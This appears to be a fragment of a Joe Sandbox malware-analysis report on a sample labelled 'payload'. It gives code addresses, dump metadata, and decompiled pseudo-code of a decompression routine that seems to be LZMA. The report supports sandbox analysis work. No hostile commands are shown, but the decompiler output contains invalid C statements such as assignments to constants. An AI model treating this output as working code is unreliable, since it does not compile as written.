0x00406845
0x0040684c
0x0040684f
0x00406852
0x00406852
0x00406857
0x00406857
0x00406859
0x0040685c
0x00406863
0x00406866
0x00406893
0x00406893
0x00406896
0x00406899
0x0040690d
0x0040690d
0x0040690d
0x00000000
0x0040690d
0x0040689b
0x004068a1
0x004068a4
0x004068a7
0x004068aa
0x004068ad
0x004068b0
0x004068b3
0x004068b6
0x004068b9
0x004068bc
0x004068d5
0x004068d7
0x004068da
0x004068db
0x004068de
0x004068e0
0x004068e3
0x004068e5
0x004068e7
0x004068ea
0x004068ec
0x004068ef
0x004068f3
0x004068f5
0x004068f5
0x004068f6
0x004068f9
0x004068fc
0x004068be
0x004068be
0x004068c6
0x004068cb
0x004068cd
0x004068d0
0x004068d0
0x004068ff
0x00406906
0x00406890
0x00406890
0x00406890
0x00406890
0x00000000
0x00406908
0x00000000
0x00406908
0x00406906
0x00406819
0x0040681c
0x0040681e
0x00406821
0x00406824
0x00406827
0x00406829
0x0040682c
0x0040682f
0x0040682f
0x00406832
0x00406832
0x00406835
0x0040683c
0x00406810
0x00406810
0x00406810
0x00406810
0x00000000
0x0040683e
0x00000000
0x0040683e
0x0040683c
0x004067c2
0x004067c5
0x004067c7
0x004067ca
0x00000000
0x00000000
0x00406529
0x00406529
0x0040652d
0x00406b72
0x00000000
0x00406b72
0x00406533
0x00406536
0x00406539
0x0040653c
0x0040653f
0x00406542
0x00406545
0x00406547
0x0040654a
0x0040654d
0x00406550
0x00406552
0x00406552
0x00406552
0x00000000
0x00000000
0x004066b4
0x004066b4
0x004066b8
0x00406b7e
0x00000000
0x00406b7e
0x004066be
0x004066c1
0x004066c4
0x004066c7
0x004066c9
0x004066c9
0x004066c9
0x004066cc
0x004066cf
0x004066d2
0x004066d5
0x004066d8
0x004066db
0x004066dc
0x004066de
0x004066de
0x004066de
0x004066e1
0x004066e4
0x004066e7
0x004066ea
0x004066ea
0x004066ea
0x004066ed
0x004066ef
0x004066ef
0x00000000
0x00000000
0x00406931
0x00406931
0x00406931
0x00406935
0x00000000
0x00000000
0x0040693b
0x0040693e
0x00406941
0x00406944
0x00406946
0x00406946
0x00406946
0x00406949
0x0040694c
0x0040694f
0x00406952
0x00406955
0x00406958
0x00406959
0x0040695b
0x0040695b
0x0040695b
0x0040695e
0x00406961
0x00406964
0x00406967
0x0040696a
0x0040696e
0x00406970
0x00406973
0x00000000
0x00406975
0x004066f2
0x004066f2
0x00000000
0x004066f2
0x00406973
0x00406ba8
0x00000000
0x00000000
0x004061d7
0x00406bdf
0x00406bdf
0x00000000
0x00406bdf
0x00406a2c
0x004069b3
0x004069b0
0x00000000
0x004065e7

Memory Dump Source

Source File: 00000001.00000002.1416540501.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.1416532338.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416552280.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416561973.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416584224.0000000000414000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416607074.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416614135.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416620175.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416629382.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416638045.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1416647770.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_payload.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
Instruction ID: 63ee65aff5d1ea53a99bb7455827a561e54e570c364fe5978cc4b9ff32097947
Opcode Fuzzy Hash: 2f3dabd0af62f4e8bfcd4b659d73a5ba33a7939e144f292b7bb16ba2439e66e8
Instruction Fuzzy Hash: E9711271D04228CBDF24CFA8C8547ADBBF1FB48305F15806AD856BB281D7786A96DF44

Uniqueness

Uniqueness Score: -1.00%

Function 00406701 Relevance: 5.2, APIs: 4, Instructions: 170
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406701() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				signed int _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t589;
				signed int* _t606;
				void* _t613;

				L0:
				while(1) {
					L0:
					if( *(_t613 - 0x40) != 0) {
						 *(_t613 - 0x84) = 0xb;
						_t606 =  *(_t613 - 4) + 0x1c8 +  *(_t613 - 0x38) * 2;
						goto L132;
					} else {
						__eax =  *(__ebp - 0x28);
						L88:
						 *(__ebp - 0x2c) = __eax;
						 *(__ebp - 0x28) =  *(__ebp - 0x2c);
						L89:
						__eax =  *(__ebp - 4);
						 *(__ebp - 0x80) = 0x15;
						__eax =  *(__ebp - 4) + 0xa68;
						 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
						L69:
						 *(__ebp - 0x84) = 0x12;
						while(1) {
							L132:
							 *(_t613 - 0x54) = _t606;
							while(1) {
								L133:
								_t531 =  *_t606;
								_t589 = _t531 & 0x0000ffff;
								_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
								if( *(_t613 - 0xc) >= _t565) {
									 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
									 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
									 *(_t613 - 0x40) = 1;
									_t532 = _t531 - (_t531 >> 5);
									 *_t606 = _t532;
								} else {
									 *(_t613 - 0x10) = _t565;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									 *_t606 = (0x800 - _t589 >> 5) + _t531;
								}
								if( *(_t613 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t613 - 0x6c) == 0) {
									 *(_t613 - 0x88) = 5;
									L170:
									_t568 = 0x22;
									memcpy( *(_t613 - 0x90), _t613 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								 *(_t613 - 0x10) =  *(_t613 - 0x10) << 8;
								 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
								 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
								 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
								L139:
								_t533 =  *(_t613 - 0x84);
								while(1) {
									 *(_t613 - 0x88) = _t533;
									while(1) {
										L1:
										_t534 =  *(_t613 - 0x88);
										if(_t534 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t534 * 4 +  &M00406BE7))) {
											case 0:
												if( *(_t613 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t534 =  *( *(_t613 - 0x70));
												if(_t534 > 0xe1) {
													goto L171;
												}
												_t538 = _t534 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t570);
												_push(9);
												_pop(_t571);
												_t609 = _t538 / _t570;
												_t540 = _t538 % _t570 & 0x000000ff;
												asm("cdq");
												_t604 = _t540 % _t571 & 0x000000ff;
												 *(_t613 - 0x3c) = _t604;
												 *(_t613 - 0x1c) = (1 << _t609) - 1;
												 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t540 / _t571) - 1;
												_t612 = (0x300 << _t604 + _t609) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
													L10:
													if(_t612 == 0) {
														L12:
														 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
														 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t612 = _t612 - 1;
														 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
													} while (_t612 != 0);
													goto L12;
												}
												if( *(_t613 - 4) != 0) {
													GlobalFree( *(_t613 - 4));
												}
												_t534 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t613 - 4) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 1;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
												 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
												_t45 = _t613 - 0x48;
												 *_t45 =  *(_t613 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t613 - 0x48) < 4) {
													goto L13;
												}
												_t546 =  *(_t613 - 0x40);
												if(_t546 ==  *(_t613 - 0x74)) {
													L20:
													 *(_t613 - 0x48) = 5;
													 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t613 - 0x74) = _t546;
												if( *(_t613 - 8) != 0) {
													GlobalFree( *(_t613 - 8)); // executed
												}
												_t534 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
												 *(_t613 - 8) = _t534;
												if(_t534 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t553 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
												 *(_t613 - 0x84) = 6;
												 *(_t613 - 0x4c) = _t553;
												_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t553) * 2;
												L132:
												 *(_t613 - 0x54) = _t606;
												goto L133;
											case 3:
												L21:
												__eflags =  *(_t613 - 0x6c);
												if( *(_t613 - 0x6c) == 0) {
													 *(_t613 - 0x88) = 3;
													goto L170;
												}
												 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
												_t67 = _t613 - 0x70;
												 *_t67 =  &(( *(_t613 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
												L23:
												 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
												if( *(_t613 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t531 =  *_t606;
												_t589 = _t531 & 0x0000ffff;
												_t565 = ( *(_t613 - 0x10) >> 0xb) * _t589;
												if( *(_t613 - 0xc) >= _t565) {
													 *(_t613 - 0x10) =  *(_t613 - 0x10) - _t565;
													 *(_t613 - 0xc) =  *(_t613 - 0xc) - _t565;
													 *(_t613 - 0x40) = 1;
													_t532 = _t531 - (_t531 >> 5);
													 *_t606 = _t532;
												} else {
													 *(_t613 - 0x10) = _t565;
													 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
													 *_t606 = (0x800 - _t589 >> 5) + _t531;
												}
												if( *(_t613 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												__eflags =  *(__ebp - 0x40) - 1;
												if( *(__ebp - 0x40) != 1) {
													__eax =  *(__ebp - 0x24);
													 *(__ebp - 0x80) = 0x16;
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x28);
													 *(__ebp - 0x24) =  *(__ebp - 0x28);
													__eax =  *(__ebp - 0x2c);
													 *(__ebp - 0x28) =  *(__ebp - 0x2c);
													__eax = 0;
													__eflags =  *(__ebp - 0x38) - 7;
													0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
													__al = __al & 0x000000fd;
													__eax = (__eflags >= 0) - 1 + 0xa;
													 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
													__eax =  *(__ebp - 4);
													__eax =  *(__ebp - 4) + 0x664;
													__eflags = __eax;
													 *(__ebp - 0x58) = __eax;
													goto L69;
												}
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 8;
												__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t613 - 0x54) = _t606;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t259 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t259;
												0 | _t259 = _t259 + _t259 + 9;
												 *(__ebp - 0x38) = _t259 + _t259 + 9;
												goto L76;
											case 0xa:
												goto L0;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												goto L88;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												goto L69;
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t613 - 0x54) = _t606;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t613 - 0x88) = _t533;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t484 = __ebp - 0x70;
												 *_t484 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t484;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L148:
												_t487 = __ebp - 0x48;
												 *_t487 =  *(__ebp - 0x48) - 1;
												__eflags =  *_t487;
												L149:
